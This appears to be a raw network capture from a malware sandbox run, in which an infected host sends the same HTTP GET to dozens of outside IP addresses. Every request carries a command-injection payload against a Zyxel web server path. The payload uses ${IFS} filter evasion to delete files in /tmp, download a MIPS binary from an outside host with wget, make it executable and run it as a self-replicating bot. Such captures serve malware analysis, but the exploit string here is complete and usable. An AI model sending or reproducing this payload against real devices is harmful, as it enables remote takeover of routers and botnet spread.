                                                Jan 12, 2024 18:16:11.164503098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1369192.168.2.2339638188.192.112.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164541006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1370192.168.2.2360426125.151.131.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164577961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1371192.168.2.2333920211.182.132.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164632082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1372192.168.2.2335802202.180.155.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164685965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1373192.168.2.234722214.9.47.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164733887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1374192.168.2.234012618.233.19.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164767027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1375192.168.2.2358174151.209.54.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164809942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1376192.168.2.2350832146.34.68.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164829969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1377192.168.2.2346360155.170.136.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164861917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1378192.168.2.233442287.211.167.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164911985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1379192.168.2.235085296.197.147.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164953947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1380192.168.2.2340856208.101.105.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164998055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1381192.168.2.2347414156.154.196.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165034056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1382192.168.2.235672049.200.240.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165066004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1383192.168.2.2344096102.71.193.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165097952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1384192.168.2.2333368118.135.73.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165127993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1385192.168.2.234687659.196.217.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165183067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1386192.168.2.233352641.52.104.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165218115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1387192.168.2.2350396189.212.26.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165251970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1388192.168.2.2333014139.252.161.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165307999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1389192.168.2.2340324103.69.2.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165324926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1390192.168.2.2334460190.28.174.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165379047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1391192.168.2.2341112179.18.174.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165426016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1392192.168.2.2334558206.5.175.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165477991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1393192.168.2.233737059.46.118.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165505886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1394192.168.2.2352016113.75.184.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165538073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1395192.168.2.2356102210.255.103.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165568113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1396192.168.2.234094817.100.160.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165622950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1397192.168.2.234554064.170.18.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165659904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1398192.168.2.233849823.2.45.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165720940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1399192.168.2.2355372190.194.11.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165740013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1400192.168.2.233965870.77.46.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165786982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1401192.168.2.234274224.63.248.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165843964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1402192.168.2.234288836.46.22.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165875912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1403192.168.2.235474874.249.181.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165904045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1404192.168.2.235529431.152.34.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165931940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1405192.168.2.235848297.169.16.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.165977955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1406192.168.2.2340136133.19.169.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166021109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1407192.168.2.233881698.169.242.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166062117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1408192.168.2.2346810110.115.146.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166099072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1409192.168.2.2337292111.154.221.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166141987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1410192.168.2.2342506194.250.74.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166177988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1411192.168.2.233506476.96.153.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166230917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1412192.168.2.235792674.251.67.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166265965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1413192.168.2.2336228102.159.75.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166307926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1414192.168.2.234966276.171.224.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166342974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1415192.168.2.233281663.174.107.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166392088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1416192.168.2.23377221.8.183.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166413069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1417192.168.2.2353796120.201.1.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166457891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1418192.168.2.2332988173.143.28.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166493893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1419192.168.2.2350922200.242.238.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166520119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1420192.168.2.234935683.41.211.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166567087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1421192.168.2.2360780126.5.207.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166591883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1422192.168.2.2343280110.147.20.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166646004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1423192.168.2.2354838136.87.206.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166677952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1424192.168.2.235816257.116.225.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166723967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1425192.168.2.235918849.73.60.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166769981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1426192.168.2.235465260.86.13.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166794062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1427192.168.2.2347860187.191.224.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166824102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1428192.168.2.235229859.181.41.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166850090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1429192.168.2.2348904209.253.125.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166908026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1430192.168.2.2352364190.52.87.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.166954994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1431192.168.2.2334680181.196.28.247443
                                                TimestampBytes transferredDirectionData
